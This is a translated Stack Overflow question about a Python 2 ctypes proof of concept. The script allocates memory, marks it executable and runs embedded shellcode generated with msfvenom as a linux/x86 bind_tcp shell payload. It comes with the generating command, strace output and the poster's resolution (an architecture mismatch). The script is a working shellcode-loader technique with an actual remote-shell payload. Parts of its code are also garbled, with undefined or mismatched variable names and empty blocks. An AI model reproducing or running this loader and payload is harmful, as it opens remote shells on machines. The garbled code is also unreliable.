背景:
编写一个概念证明,包括在正在运行的python进程中执行机器代码。想要实现跨平台的功能,但在unix系统上测试时出现了问题。
几乎与这个问题完全一样:Python ctypes and function calls,但这次解决方案不起作用。
python Problem:当在VM 32位Ubuntu服务器12.04.5 LTS中执行python脚本时,输出为
Segmentation fault (core dumped)
这意味着我被拒绝访问我没有权限的内存。这是奇怪的b/c在源代码中我还设置了cytpes.mprotect(allocated_space,space_size,7) <== 4+2+1用于写操作权限
注意:未经所有者完全同意,请不要试图在机器上执行以下机器代码进行测试。
Python脚本
#!/usr/bin/env python
import ctypes
import os
import sys
# linux machine code
buf += "\xbd\xfc\xa1\x5d\x63\xd9\xee\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x1c\x31\x6e\x14\x03\x6e\x14\x83\xee\xfc\x1e"
buf += "\x54\x37\x1e\x86\x0e\x7a\xe7\x8f\x31\x6b\xe8\xef\xb8"
buf += "\x68\x8e\x6e\x59\x6e\xbf\xbd\x1e\x5e\xe4\xca\xfc\xf2"
buf += "\x59\x67\x69\xf7\xd4\x66\xdd\x91\x2b\xe8\x4f\x34\xb0"
buf += "\xbc\x05\xca\xd2\x3d\x8a\x5d\xab\xdc\x40\x6c\xf7\x74"
buf += "\xf3\x28\xca\x08\x6c\x4b\x10\x1c\xca\x17\xc7\x4e\x84"
buf += "\xa5\xf7\x7f\x08\xc0\xe7\x2e\xe0\x9d\xe9\xba\x66\xc6"
buf += "\x24\xba\xb6\x15\x06\xdc\xf5\x5a\x37\x63\xb6\x3d\x31"
buf += "\x32\xb2\x0c\xc1\x27\x0c\x82\x72\x44\xbc\x1b\xf5\x95"
buf += "\x65\xac\xfc\xe4\x1a\x33\xe1"
def main(buf):
if os.name == 'posix':
try:
libc = ctypes.CDLL('libc.so.6')
buf_ptr = ctypes.c_char_p(buf)
size = len(buf)
addr_freespace = ctypes.c_void_p(libc.valloc(size))
ctypes.memmove(addr_freespace, buf_ptr, size)
libc.mprotect(addr_free_space, size, 1 | 2 | 4) # changed to 7 for all three access
run = ctypes.cast(free_space, ctypes.CFUNCTYPE(ctypes.c_void_p))
run()
sys.exit()
except Exception as e:
print "Error: " e
else:
try: # windows implementation
if __name__ == '__main__':
main(buf)
问题:谁能解释一下为什么会出现分段错误消息,以及我们如何解决这样的问题?
Credits:这个unix实现起源于sickle.py @ Line743-753
唯一的区别是参考脚本使用的是python3,而我使用的是python2.7。
更新:
经过多次尝试和错误,包括在pdb中运行程序。分段错误发生在以下行之后:
run()
有人能解释一下为什么会发生这样的事情吗?
编辑:
使用以下命令生成的机器代码/外壳代码:
msfvenom --payload linux/x86/shell/bind_tcp --format py --arch x86 --bad-char "\x00\x20\x0d"
这篇PoC的灵感来自于SPSE和twittor的Viviek教授。
使用strace精确定位的
分段故障前的结果如下:
mprotect(0x11ad000, 137, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
capget(0x1, 0, {CAP_CHOWN|CAP_FSETID|CAP_SETGID|CAP_NET_BIND_SERVICE|CAP_SYS_MODULE|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_SYS_BOOT|CAP_SYS_NICE|CAP_SETFCAP, CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_FSETID|CAP_SETUID|CAP_LINUX_IMMUTABLE|CAP_NET_BIND_SERVICE|CAP_NET_ADMIN|CAP_NET_RAW|CAP_IPC_OWNER|CAP_SYS_CHROOT|CAP_SYS_PTRACE|CAP_LEASE|CAP_AUDIT_WRITE|CAP_SETFCAP, CAP_CHOWN|CAP_DAC_OVERRIDE|CAP_SETPCAP|CAP_NET_BIND_SERVICE|CAP_NET_BROADCAST|CAP_IPC_LOCK|CAP_IPC_OWNER|CAP_SYS_NICE|CAP_SYS_RESOURCE|CAP_SYS_TIME|CAP_SYS_TTY_CONFIG|CAP_SETFCAP}) = -1 ENOMEM (Cannot allocate memory)
getuid() = -1 EINVAL (Invalid argument)
getuid() = -1 EFAULT (Bad address)
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV (core dumped) +++
发布于 2018-06-04 07:11:24
系统信息不好,虚拟机运行在x64架构上,所以在脚本中输入x64代码效果很好。终于解开了谜团,感谢@Jester指出问题并指出问题。
https://stackoverflow.com/questions/50669205
复制相似问题